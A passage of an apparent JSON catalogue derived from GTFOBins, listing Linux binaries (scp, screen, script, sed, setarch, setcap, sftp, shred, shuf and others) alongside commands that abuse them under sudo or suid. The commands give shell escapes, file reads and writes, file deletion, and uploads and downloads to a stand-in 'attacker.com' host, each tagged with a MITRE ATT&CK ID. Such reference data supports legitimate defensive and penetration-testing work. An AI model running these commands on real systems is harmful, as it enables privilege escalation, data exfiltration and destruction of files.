host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:upload:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:1:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:file-write:1:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:shell:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:screen:shell:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:file-write:0:sudo","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:file-write:0:suid","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:file-write:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:shell:0:sudo","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:shell:0:suid","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:script:shell:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scrot:shell:0:sudo","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scrot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scrot:shell:0:suid","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scrot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scrot:shell:0:unprivileged","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scrot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-read:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-read:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-read:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-write:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-write:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:file-write:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:1:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:1:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sed:shell:1:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:service:shell:0:sudo","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/service/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:service:shell:0:unprivileged","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/service/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setarch:shell:0:sudo","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setarch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setarch:shell:0:suid","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setarch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setarch:shell:0:unprivileged","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setarch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setcap:privilege-escalation:0:sudo","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setcap:privilege-escalation:0:suid","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setfacl:privilege-escalation:0:sudo","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setfacl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setfacl:privilege-escalation:0:suid","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setfacl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setlock:shell:0:sudo","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setlock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setlock:shell:0:suid","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setlock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:setlock:shell:0:unprivileged","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setlock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:download:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:download:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:download:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:shell:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:shell:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:shell:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:upload:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:upload:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sftp:upload:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sg:shell:0:sudo","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sg root","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sg:shell:0:unprivileged","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sg $(id -ng)","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shred:file-write:0:sudo","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shred/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shred:file-write:0:suid","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shred/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shred:file-write:0:unprivileged","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shred/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-read:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-read:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 